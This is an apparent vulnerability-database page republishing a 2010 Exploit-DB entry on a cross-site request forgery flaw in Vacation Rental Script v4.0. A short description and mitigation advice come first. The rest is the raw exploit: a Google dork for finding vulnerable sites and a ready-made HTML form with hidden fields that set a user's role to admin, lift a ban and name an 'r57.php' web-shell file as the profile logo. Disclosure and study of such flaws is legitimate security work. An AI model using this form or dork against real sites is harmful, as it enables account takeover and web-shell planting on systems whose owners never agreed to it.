Vacation Rental Script v4.0 XSRF VULNERABILTY

vendor:

Vacation Rental Script

by:

OnurTURKESHAN

8,8

CVSS

HIGH

Cross-Site Request Forgery (XSRF)

352

CWE

Product Name: Vacation Rental Script

Affected Version From: v4.0

Affected Version To: v4.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Tested +WorKs

2010

Vacation Rental Script v4.0 XSRF VULNERABILTY

Vacation Rental Script v4.0 is vulnerable to Cross-Site Request Forgery (XSRF) attacks. An attacker can craft a malicious HTML form and submit it to the vulnerable application. This form can contain hidden fields that can be used to modify the application state, such as changing the user role to 'admin' or changing the user's email address. This vulnerability can be exploited without authentication.

Mitigation:

The application should use a CSRF token to verify that the request is coming from a trusted source. The application should also validate all user input to prevent malicious data from being submitted.

Source

Exploit-DB raw data:

# Exploit Title: Vacation Rental Script v4.0 XSRF VULNERABILTY
# Google Dork: "2006 - 2009 Vacation Rental Script"
# Date: 24.12.2010
# Author: OnurTURKESHAN
# Software Link: http://www.vacationrentalscript.com/
# Version: v.4.0
# Tested on: v4.0 TEsted +WorKs
#ResPecT My FrienDz : BARC0D3-SZE-BlackApple-Fl0rix-Sky_Lab-Ufuq-VoLqaN-KaBaDaYı-BraveHeart-CWScriptKiddiE-FinishedLife AND ALL MY FRIENDZ
---------------------------------------------
<form id="users_edit" method="post" action="http://SİTE.COM/home/members/profile/edit/MEMBERİD" enctype="multipart/form-data">
    <input type="hidden" name="profile_logo" id="profile_logo" value="r57.php-2.jpeg" />
    <input type="hidden" name="role" id="role" value="admin" />
    <input type="hidden" name="banned" id="banned" value="0" />
                    <input class="text" type="text" id="user_name" name="user_name" value="USERNAME" />
                    <input class="text" type="text" id="email" name="email" value="MAIL@MAIL.COM" />
                    <input class="text" type="password" id="password" name="password"  />
                    <input class="text" type="password" id="retype_password" name="retype_password"  />
                    <input class="btn-orange" type="submit" value="Save profile" id="submit" name="submit" /><div class="btn-orange-end"> </div>
      
    </form>

www.myfreshdate.com / www.onurturkeshan.com / www.cyber-warrior.org